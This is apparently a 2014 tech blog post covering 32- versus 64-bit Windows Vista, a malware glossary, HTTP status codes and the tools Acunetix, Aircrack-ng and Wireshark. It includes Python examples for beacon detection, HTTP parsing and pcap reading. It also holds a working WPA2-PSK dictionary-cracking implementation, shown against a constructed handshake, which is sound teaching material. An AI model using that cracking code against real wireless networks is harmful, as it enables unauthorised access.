Tuesday 12 August 2014

32 bit vs 64 bit (for Windows users & system administrators)

Technically, x86 simply refers to a family of processors and the instruction set they all use. It does not say anything specific about data sizes.

x86 started out as a 16-bit instruction set for 16-bit processors (the 8086 and 8088), was extended to a 32-bit instruction set for 32-bit processors (80386 and 80486), and has since been extended to a 64-bit instruction set for 64-bit processors. It used to be written as 80x86 to reflect the changing value in the middle of the chip model numbers, but somewhere along the line the leading 80 was dropped, leaving just x86.

Blame the Pentium and its offspring for changing the way processors were named and marketed, although all newer processors using Intel's x86 instruction set are still referred to as x86, i386 or i686 compatible (which means they all use extensions of the original 8086 instruction set).

x64 is really the odd man out here. The first name for the 64-bit extension to the x86 set was x86-64. It was later renamed AMD64, because AMD came up with the 64-bit extension originally. Intel licensed the 64-bit instruction set and named its implementation EM64T (now Intel 64). x64 is simply the name Windows uses for the same architecture. Both instruction sets and the processors that implement them are still considered x86. Do not confuse x64 with IA-64 (Itanium), which is a different architecture and is not x86 compatible at all.
System requirements
32 bit :- 1-gigahertz (GHz) 32-bit (x86) processor or 64-bit (x64) processor, 512 MB of RAM
64 bit :- 1-GHz 64-bit (x64) processor, 1 GB of RAM (4 GB recommended)
Memory access
32 bit :- A 32-bit version of Windows Vista can address up to 4 GB of RAM. In practice only about 3 to 3.5 GB is usable, because device memory (graphics cards, PCI devices) is mapped into the same 4 GB address space.
64 bit :- A 64-bit version of Windows Vista can use from 1 GB of RAM to more than 128 GB of RAM, depending on the edition.
Memory access per edition
32 bit :- All 32-bit versions of Windows Vista are limited to 4 GB of RAM.
64 bit :- Windows Vista Home Basic – 8 GB of RAM
Windows Vista Home Premium – 16 GB of RAM
Windows Vista Business – 128 GB of RAM or more
Windows Vista Enterprise – 128 GB of RAM or more
Windows Vista Ultimate – 128 GB of RAM or more
DEP (Data Execution Prevention)
32 bit :- 32-bit versions of Windows Vista provide software-enforced DEP on every processor, and hardware-enforced DEP when the processor supports the NX/XD bit (the kernel then runs in PAE mode to get the no-execute page bit).
64 bit :- 64-bit versions of Windows Vista always use hardware-enforced DEP: every x64 processor supports NX, and DEP cannot be turned off for native 64-bit processes. 32-bit programs running under WOW64 still follow the normal opt-in/opt-out policy.
Kernel Patch Protection (PatchGuard)
32 bit :- This feature is not available in 32-bit versions of Windows Vista.
64 bit :- This feature is available in 64-bit versions of Windows Vista. Kernel Patch Protection helps prevent a malicious program from modifying the Windows Vista kernel. It periodically checks critical kernel code and data structures (such as the system service and interrupt descriptor tables) and, if it finds a modification, stops the system with a bug check rather than let a patched kernel keep running. In practice this prevents kernel-mode drivers from extending or replacing kernel services and stops third-party programs from patching any part of the kernel. It is also why antivirus products and rootkits that rely on hooking the kernel on 32-bit Windows cannot work the same way on x64.
Driver signing
32 bit :- 32-bit versions of Windows Vista load 32-bit drivers designed for Windows Vista. Unsigned kernel-mode drivers are still allowed, with a warning at install time.
64 bit :- 64-bit versions of Windows Vista require every kernel-mode driver to be digitally signed (kernel-mode code signing) and do not load 32-bit device drivers at all. User-mode applications, by contrast, can still run as 32-bit under WOW64.
16-bit program support
32 bit :- 32-bit versions of Windows Vista can run 16-bit programs through the NTVDM subsystem, with limitations.
64 bit :- 64-bit versions of Windows Vista do not support 16-bit programs: WOW64 runs 32-bit code only, and there is no NTVDM.
Note:-
If you value the benefits and advantages of switching to 64-bit Windows Vista, here are a few considerations to ponder before making the move to install x64 Windows Vista:
64-bit device drivers may not be available for one or more devices in the computer.
Device drivers must be digitally signed.
32-bit device drivers are not supported.
32-bit programs may not be fully compatible with a 64-bit operating system (they run under WOW64, but anything that installs a driver, a shell extension or a kernel hook needs a 64-bit build).
It may be difficult to locate programs that are written specifically for a 64-bit operating system.
Not all hardware devices may be compatible with a 64-bit version of Windows Vista.

Computer threats: Malware, Spyware, Virus, Worm, Bot, Backdoor

Virus – this term used to be generic: any bad software used to be a virus; today we use the term "malware" for that. We now use "virus" for a program that self-replicates by attaching itself to another program or file and running whenever that host runs.

Worm – a worm is another kind of self-replicating program, but it does not need a host file. Worms spread on their own across a network, typically by exploiting a vulnerability in a network service or by guessing weak credentials, and then generally run quietly in the background of the infected system.

Trojan – software that you thought was going to be one thing but turns out to be something bad. Named for the fabled "Trojan Horse" that appeared to be a gift but in fact carried a dangerous payload.

Drive-by download – this is one of the most common ways to get something nasty onto your computer. Most of the time it comes from visiting a malicious or compromised web page. That page exploits a weakness in your browser or one of its plug-ins (Java, Flash, PDF readers) and causes your system to become infected without you knowingly installing anything.
Malware Actions
Malware:
This is a big catch-all phrase that covers all sorts of software with nasty intent. Not buggy software, not programs you don't like, but software which is specifically written with the intent to harm.
Once malware is on your computer it can do many things. Sometimes it is only trying to replicate itself with no harm to anyone; other times it is capable of doing very nasty things.

Adware – not truly malware and almost never delivered using one of the methods above. Adware is software that uses some form of advertising delivery system. Sometimes the way advertisements are delivered is deceptive, in that the software tracks or reveals more information about you than you would like. Most of the time you agree to the adware tracking you when you install the software it comes bundled with. Generally it can be removed by uninstalling the software it was attached to.

Spyware – software that monitors your computer and reveals the collected information to an interested party. This can be relatively benign when it tracks which web pages you visit, or incredibly invasive when it records everything you do with your mouse and keyboard, including passwords.

Ransomware – lately a very popular way for Internet criminals to make money. This malware alters your system so that you are unable to use it normally, either by locking the screen or, in newer variants, by encrypting your files. It then displays a screen demanding payment to have the computer unlocked or the files decrypted. Access to your computer is literally ransomed by the cyber-criminal. Paying does not guarantee recovery; offline backups are the reliable defence.

Scareware – software that appears to be something legitimate (usually masquerading as a tool to help fix your computer) but, when it runs, tells you that your system is infected or broken in some way. The message is delivered in a manner meant to frighten you into doing something, and the software claims to be able to fix the problem if you pay. Scareware is also referred to as "rogue" software, as in rogue antivirus.
Bots
"Bot" is derived from the word "robot" and means an automated process that interacts with other network services. Bots often automate tasks and provide information or services that would otherwise be performed by a human being. Typical uses of bots are to gather information (web crawlers, for example) or to interact automatically with instant messaging (IM), Internet Relay Chat (IRC) or other web interfaces. They may also be used to interact dynamically with websites.

Bots can be used for either good or malicious purposes. A malicious bot is self-propagating malware designed to infect a host and connect back to a central server or servers that act as a command and control (C&C) centre for an entire network of compromised devices, or "botnet". With a botnet, attackers can launch broad-based, remote-controlled, flood-type (DDoS) attacks against their targets. In addition to the worm-like ability to self-propagate, bots can include the ability to log keystrokes, gather passwords, capture and analyse packets, gather financial information, launch DoS attacks, relay spam and open back doors on the infected host.

Bots have all the advantages of worms but are generally much more versatile in their infection vector, and are often modified within hours of the publication of a new exploit. They have been known to exploit back doors opened by worms and viruses, which lets them reach networks that have good perimeter control. Bots rarely announce their presence with the high scan rates that damage network infrastructure; instead they infect networks in a way that escapes immediate notice, checking in with their C&C server quietly and at intervals.
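The behaviour described above, a compromised host checking in with its C&C server at a steady interval with small, similar-sized connections while avoiding noisy scanning, is what beacon detection looks for in outbound connection logs. The following is an added example (Python, not part of the original post) that groups connection records by source and destination and flags flows whose inter-connection gaps and payload sizes are suspiciously regular; the log lines, hosts and addresses are constructed for the example. It is a triage heuristic, not proof of infection: legitimate software such as NTP clients and update checkers also beacons, so hits need an allowlist and follow-up.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: outbound connection records as "timestamp src dst:port bytes".
# 203.0.113.7:443 is contacted exactly once a minute with near-constant sizes (a beacon);
# 198.51.100.20:80 is ordinary, irregular browsing. One line is deliberately out of order.
SAMPLE_LOG = """\
2014-08-12T09:00:00 10.0.0.15 203.0.113.7:443 412
2014-08-12T09:00:04 10.0.0.15 198.51.100.20:80 3820
2014-08-12T09:01:00 10.0.0.15 203.0.113.7:443 410
2014-08-12T09:02:00 10.0.0.15 203.0.113.7:443 415
2014-08-12T09:02:31 10.0.0.15 198.51.100.20:80 12044
2014-08-12T09:03:00 10.0.0.15 203.0.113.7:443 411
2014-08-12T09:04:00 10.0.0.15 203.0.113.7:443 409
2014-08-12T09:05:00 10.0.0.15 203.0.113.7:443 413
2014-08-12T09:07:12 10.0.0.15 198.51.100.20:80 900
2014-08-12T09:06:00 10.0.0.15 203.0.113.7:443 412
2014-08-12T09:09:40 10.0.0.15 198.51.100.20:80 2210
"""


def parse_log(text: str) -> dict:
    """Group records by (source, destination); the log is not assumed to be in time order."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, nbytes = line.split()
        flows[(src, dst)].append((datetime.fromisoformat(ts), int(nbytes)))
    return flows


def find_beacons(flows: dict, min_connections: int = 5, max_gap_cv: float = 0.2,
                 max_size_cv: float = 0.1) -> list:
    """Flag flows whose inter-connection gaps and payload sizes are suspiciously regular.

    cv is the coefficient of variation (standard deviation / mean); 0 means perfectly
    regular. max_gap_cv tolerates the jitter many implants add to their sleep interval.
    """
    hits = []
    for (src, dst), conns in flows.items():
        if len(conns) < min_connections:
            continue
        conns.sort()
        times = [t for t, _ in conns]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        sizes = [n for _, n in conns]
        if mean(gaps) <= 0 or mean(sizes) <= 0:
            continue
        gap_cv = pstdev(gaps) / mean(gaps)
        size_cv = pstdev(sizes) / mean(sizes)
        if gap_cv <= max_gap_cv and size_cv <= max_size_cv:
            hits.append({"src": src, "dst": dst, "count": len(conns),
                         "period_s": round(mean(gaps), 1), "gap_cv": round(gap_cv, 3),
                         "size_cv": round(size_cv, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"possible C&C beacon: {hit['src']} -> {hit['dst']} every {hit['period_s']}s "
              f"({hit['count']} connections, gap cv {hit['gap_cv']}, size cv {hit['size_cv']})")
```

Run over proxy or firewall logs, the same logic works per destination rather than per source to catch several infected hosts reporting to one C&C server; raise max_gap_cv to catch implants with heavier jitter at the cost of more false positives.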
Exploit
An exploit is a piece of software, a command or a methodology that takes advantage of a particular security vulnerability. Exploits are not always malicious in intent; they are sometimes used only as a way of demonstrating that a vulnerability exists (a proof of concept). However, they are a common component of malware and the usual way a drive-by download or a worm gets its first foothold.

Back Door
A back door is an undocumented way of accessing a system that bypasses the normal authentication mechanisms. Some back doors are placed in software by the original programmer; others are placed on systems through a compromise, such as by a virus or worm. Usually attackers use back doors for easier and continued access to a system after it has been compromised, which is why incident response has to look for them rather than only removing the malware that was first noticed.

Meaning of HTTP Status Codes

HTTP, the Hypertext Transfer Protocol, is the method by which clients (i.e. you, through your browser) and servers communicate. When someone clicks a link, types in a URL or submits a form, their browser sends a request to a server. It might be asking for a page or sending data, but either way that message is called an HTTP request. When a server receives the request, it sends back an HTTP response carrying a three-digit status code, a set of headers and, usually, a body for the client.

Usually this is invisible, though I'm sure you've seen one of the very common response codes: 404, indicating a page was not found. The first digit of the code gives its class (1xx informational, 2xx success, 3xx redirection, 4xx client error, 5xx server error). There are a fair few more status codes sent by servers, and the following is a list of the current ones in HTTP 1.1, along with an explanation of their meanings.
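To make the request/response exchange concrete, here is an added example (Python, not part of the original post) of a strict parser for the response side: it validates the status line against the RFC 7230 grammar, classifies the code by its first digit, rejects header fields with whitespace before the colon (a classic source of parsing differentials between proxies and servers), checks for conflicting Content-Length values and reports whether the body is complete. The sample responses are constructed.

```python
import re

# RFC 7230 status-line: HTTP-version SP status-code SP reason-phrase (the reason may be empty).
STATUS_LINE = re.compile(r"^HTTP/(\d)\.(\d) (\d{3})(?: ([^\r\n]*))?$")
STATUS_CLASSES = {1: "Informational", 2: "Success", 3: "Redirection",
                  4: "Client Error", 5: "Server Error"}

# Constructed sample responses.
SAMPLE_OK = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 5\r\n\r\nhello"
SAMPLE_REDIRECT = (b"HTTP/1.1 301 Moved Permanently\r\nLocation: https://example.com/\r\n"
                   b"Content-Length: 0\r\n\r\n")
SAMPLE_NOT_FOUND = b"HTTP/1.1 404 Not Found\r\nContent-Length: 9\r\n\r\nnot found"
SAMPLE_BAD_STATUS = b"HTTP/1.1 20 OK\r\n\r\n"                                # two-digit code
SAMPLE_BAD_HEADER = b"HTTP/1.1 200 OK\r\nContent-Length : 5\r\n\r\nhello"   # space before colon


def status_class(code: int) -> str:
    """Class of a status code from its first digit; anything outside 1xx-5xx is unknown."""
    return STATUS_CLASSES.get(code // 100, "Unknown")


def parse_response(raw: bytes) -> dict:
    """Parse a raw HTTP/1.x response, rejecting malformed status lines and header fields."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response: no end of header section")
    lines = head.decode("iso-8859-1").split("\r\n")
    m = STATUS_LINE.match(lines[0])
    if not m:
        raise ValueError(f"malformed status line: {lines[0]!r}")
    code = int(m.group(3))
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        # RFC 7230 section 3.2.4: whitespace between the field name and the colon must be
        # rejected; obsolete line folding (a line starting with whitespace) is not accepted here.
        if not colon or not name or name != name.strip():
            raise ValueError(f"malformed header field: {line!r}")
        headers.setdefault(name.lower(), []).append(value.strip())
    body_complete = None   # unknown when no Content-Length (chunked or close-delimited body)
    declared = headers.get("content-length")
    if declared is not None:
        if len(set(declared)) > 1:
            raise ValueError("conflicting Content-Length values")
        if not declared[0].isdigit():
            raise ValueError(f"invalid Content-Length: {declared[0]!r}")
        length = int(declared[0])
        body_complete = len(body) >= length
        body = body[:length]
    return {"version": f"{m.group(1)}.{m.group(2)}", "status": code, "class": status_class(code),
            "reason": m.group(4) or "", "headers": headers, "body": body,
            "body_complete": body_complete}


if __name__ == "__main__":
    for sample in (SAMPLE_OK, SAMPLE_REDIRECT, SAMPLE_NOT_FOUND, SAMPLE_BAD_STATUS, SAMPLE_BAD_HEADER):
        try:
            r = parse_response(sample)
            print(r["status"], r["class"], r["reason"], dict(r["headers"]), r["body"])
        except ValueError as err:
            print("rejected:", err)
```

The strictness is deliberate: a lenient parser that accepts "Content-Length : 5" or two different Content-Length headers may disagree with the server or proxy in front of it about where one response ends and the next begins.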

Acunetix

Acunetix comes in free and paid versions. This web vulnerability scanner has many uses, but in essence it tests for, and reports on, SQL injection and cross-site scripting (XSS). It has a state-of-the-art crawler that includes a client script analyzer engine, which analyses client-side JavaScript while crawling. The tool generates detailed reports that identify security issues and vulnerabilities. The latest version at the time of writing, Acunetix WVS version 8, adds several features such as a new module that tests for slow HTTP denial-of-service conditions. It also ships with a compliance report template for ISO 27001. This is useful for penetration testers and developers, although a scanner report shows only what the scanner found: it is evidence for an ISO 27001 assessment of a web application, not proof of compliance on its own.

Aircrack-ng

Aircrack-ng is a comprehensive suite of wireless security tools. It includes aircrack-ng (which cracks WEP keys and runs dictionary attacks against WPA/WPA2-PSK handshakes), airdecap-ng (which decrypts WEP- or WPA-encrypted capture files once the key is known), airmon-ng (which places wireless cards into monitor mode, for example an Alfa adapter with the rtl8187 chipset), aireplay-ng (a packet injector), airodump-ng (a packet sniffer that also captures the WPA handshakes aircrack-ng needs), airtun-ng (which creates virtual tunnel interfaces), packetforge-ng (which creates encrypted packets for injection), airbase-ng (which implements techniques for attacking clients, such as acting as a rogue access point) and airdecloak-ng (which removes WEP cloaking from captures). Other tools include airdriver-ng (to manage wireless drivers), airolib-ng (which stores and manages ESSID and password lists and precomputes the Pairwise Master Keys derived from them, so that WPA cracking runs much faster), airserv-ng (a wireless card server that lets the penetration tester use a card from another computer over the network), easside-ng (which communicates with a WEP access point without knowing the WEP key), tkiptun-ng (for WPA/TKIP attacks) and wesside-ng (an automated tool for recovering WEP keys).

Like most of the security tools in our list, Aircrack-ng also has a GUI front end, called Gerix Wifi Cracker. Gerix is free software under the GNU General Public License and is bundled with penetration testing Linux distributions such as Kali Linux, BackTrack and BackBox. The Gerix GUI wraps several of the suite's tools for network analysis, wireless packet capture and packet injection.
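The WPA/WPA2-PSK dictionary attack that aircrack-ng runs, and the precomputation that airolib-ng does for it, follow the IEEE 802.11i key derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations), PTK = PRF-384(PMK, "Pairwise key expansion", MACs and nonces), and the candidate is confirmed when the KCK (the first 16 bytes of the PTK) reproduces the MIC on a captured EAPOL-Key frame. The following is an added example (Python, not aircrack-ng's code) that implements that chain and cracks a constructed handshake; the ESSID, MAC addresses, nonces and wordlist are invented for the example, while the PMK step is checked against the IEEE 802.11i Annex H test vector ("password"/"IEEE"). Because the ESSID is the PBKDF2 salt, a PMK table is only useful for the one network name it was built for, which is why airolib-ng tables are keyed by ESSID.

```python
import hashlib
import hmac

MIC_OFFSET = 81   # Key MIC field offset inside an EAPOL-Key frame (802.1X header included)

# Constructed handshake parameters (not from a real capture).
ESSID = "ExampleNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
WORDLIST = ["password", "letmein", "correct horse battery", "12345678"]


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes) per IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_kck(pmk: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)); KCK = PTK[0:16]."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol: bytes, wpa2: bool = True) -> bytes:
    """MIC over the frame with its MIC field zeroed: HMAC-SHA1 (WPA2) or HMAC-MD5 (WPA/TKIP), 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def build_pmk_table(essid: str, wordlist) -> dict:
    """What airolib-ng precomputes: passphrase -> PMK for one ESSID (the slow PBKDF2 step)."""
    return {word: wpa_pmk(word, essid) for word in wordlist}


def crack(handshake: dict, wordlist, pmk_table: dict = None):
    """Dictionary attack: PBKDF2 per word (or a table lookup), then one PRF and one HMAC to test the MIC."""
    captured_mic = handshake["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_table[word] if pmk_table else wpa_pmk(word, handshake["essid"])
        kck = derive_kck(pmk, handshake["ap"], handshake["sta"], handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), captured_mic):
            return word
    return None


def make_handshake(essid: str, passphrase: str, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> dict:
    """Constructed stand-in for a captured 4-way handshake message 2 (client -> AP) with a valid MIC."""
    kck = derive_kck(wpa_pmk(passphrase, essid), ap, sta, anonce, snonce)
    body = (b"\x02"                  # descriptor type: RSN (WPA2)
            + b"\x01\x0a"            # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC present
            + b"\x00\x10"            # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"  # replay counter
            + snonce                 # key nonce (32 bytes)
            + b"\x00" * 16           # key IV
            + b"\x00" * 8            # key RSC
            + b"\x00" * 8            # key ID
            + b"\x00" * 16           # key MIC placeholder, filled in below
            + b"\x00\x00")           # key data length 0
    frame = bytearray(b"\x01\x03" + len(body).to_bytes(2, "big") + body)  # 802.1X: version 1, EAPOL-Key
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return {"essid": essid, "ap": ap, "sta": sta, "anonce": anonce, "snonce": snonce, "eapol": bytes(frame)}


if __name__ == "__main__":
    hs = make_handshake(ESSID, "correct horse battery", AP_MAC, STA_MAC, ANONCE, SNONCE)
    print("recovered passphrase:", crack(hs, WORDLIST))
    print("with precomputed PMK table:", crack(hs, WORDLIST, build_pmk_table(ESSID, WORDLIST)))
```

The 4096 PBKDF2 iterations per candidate are the whole cost of the attack; everything after the PMK is one HMAC-SHA1 chain, which is why precomputed per-ESSID tables (and, later, GPUs) speed up WPA cracking so much, and why a long random passphrase rather than a common word is the only real defence for WPA2-PSK.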

Wireshark

Wireshark has been around for ages and is extremely popular. Wireshark lets the pentester put a network interface into promiscuous mode so that it captures every frame that reaches the interface, not just frames addressed to the host; on a switched network that still means only your own traffic plus broadcasts and multicasts unless a mirror (SPAN) port, hub or tap is used. This tool has many features, such as capturing data from a live network connection or reading a file of already-captured packets (pcap and pcapng). Wireshark can read data from a wide variety of link types, including Ethernet, IEEE 802.11, PPP and even loopback. Like most tools in our 2013 Concise Courses Security List, the captured network data can be monitored and managed via a GUI, which also allows plug-ins (dissectors) to be added and used. Wireshark can also capture VoIP packets and raw USB traffic.
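The classic capture file format Wireshark reads and writes is libpcap's pcap: a 24-byte global header followed by 16-byte record headers, each with a captured length that must not exceed the snapshot length. The following is an added example (Python, not Wireshark's code) of a minimal reader for that format that handles both byte orders, the nanosecond-resolution magic, truncated files and bad length fields, and decodes the Ethernet header of each record when the link type is Ethernet. The capture it parses is constructed inside the block; pcapng, the default save format of current Wireshark versions, has a different block structure and is rejected rather than parsed.

```python
import struct
import sys

LINKTYPES = {0: "NULL/loopback (BSD)", 1: "Ethernet", 9: "PPP",
             105: "IEEE 802.11", 127: "IEEE 802.11 + radiotap"}
GLOBAL_HEADER_LEN, RECORD_HEADER_LEN = 24, 16


def mac(addr: bytes) -> str:
    return ":".join(f"{b:02x}" for b in addr)


def parse_pcap(data: bytes) -> dict:
    """Parse a classic pcap file into a summary dict; raise ValueError on anything malformed."""
    if len(data) < GLOBAL_HEADER_LEN:
        raise ValueError("file shorter than the pcap global header")
    (magic,) = struct.unpack_from("<I", data, 0)
    if magic in (0xA1B2C3D4, 0xA1B23C4D):        # written on a little-endian host
        endian = "<"
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):      # written on a big-endian host (byte-swapped)
        endian = ">"
    else:
        raise ValueError(f"not a pcap file (magic 0x{magic:08x}); pcapng is not handled here")
    nanosecond = magic in (0xA1B23C4D, 0x4D3CB2A1)
    vmaj, vmin, _tz, _sigfigs, snaplen, linktype = struct.unpack_from(endian + "HHiIII", data, 4)
    records = []
    off = GLOBAL_HEADER_LEN
    while off < len(data):
        if off + RECORD_HEADER_LEN > len(data):
            raise ValueError(f"truncated record header at offset {off}")
        ts_sec, ts_frac, incl_len, orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += RECORD_HEADER_LEN
        if incl_len > snaplen or incl_len > orig_len:
            raise ValueError(f"record at offset {off - RECORD_HEADER_LEN}: captured length {incl_len} "
                             f"exceeds snaplen {snaplen} or original length {orig_len}")
        if off + incl_len > len(data):
            raise ValueError(f"truncated packet data at offset {off}")
        pkt = data[off:off + incl_len]
        off += incl_len
        rec = {"ts": ts_sec + ts_frac / (1e9 if nanosecond else 1e6), "caplen": incl_len, "len": orig_len}
        if linktype == 1 and incl_len >= 14:      # Ethernet II header: dst, src, ethertype
            rec["dst"], rec["src"] = mac(pkt[0:6]), mac(pkt[6:12])
            (rec["ethertype"],) = struct.unpack_from("!H", pkt, 12)
        records.append(rec)
    return {"version": f"{vmaj}.{vmin}", "linktype": LINKTYPES.get(linktype, f"unknown ({linktype})"),
            "snaplen": snaplen, "byte_order": "little" if endian == "<" else "big", "records": records}


def build_pcap(packets, endian: str = "<", linktype: int = 1, snaplen: int = 65535,
               base_ts: int = 1407834000) -> bytes:
    """Constructed writer used to produce the sample input (classic pcap, microsecond timestamps)."""
    out = struct.pack(endian + "IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, snaplen, linktype)
    for i, pkt in enumerate(packets):
        out += struct.pack(endian + "IIII", base_ts + i, 1000 * i, len(pkt), len(pkt)) + pkt
    return out


# Constructed Ethernet frames: an IPv4 frame (ethertype 0x0800) and a broadcast ARP request (0x0806).
FRAME_IPV4 = (bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
              + b"\x45" + b"\x00" * 39)
FRAME_ARP = (bytes.fromhex("ffffffffffff") + bytes.fromhex("66778899aabb") + b"\x08\x06"
             + b"\x00\x01\x08\x00\x06\x04\x00\x01" + b"\x00" * 20)
SAMPLE_PCAP = build_pcap([FRAME_IPV4, FRAME_ARP])


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    cap = parse_pcap(data)
    print(f"pcap v{cap['version']}, {cap['linktype']}, snaplen {cap['snaplen']}, {cap['byte_order']}-endian")
    for rec in cap["records"]:
        print(rec)
```

The two length checks matter for anyone writing tools that consume untrusted captures: a record whose captured length exceeds the snapshot length or the remaining file is corrupt or hostile, and a reader that trusts it will read past the buffer.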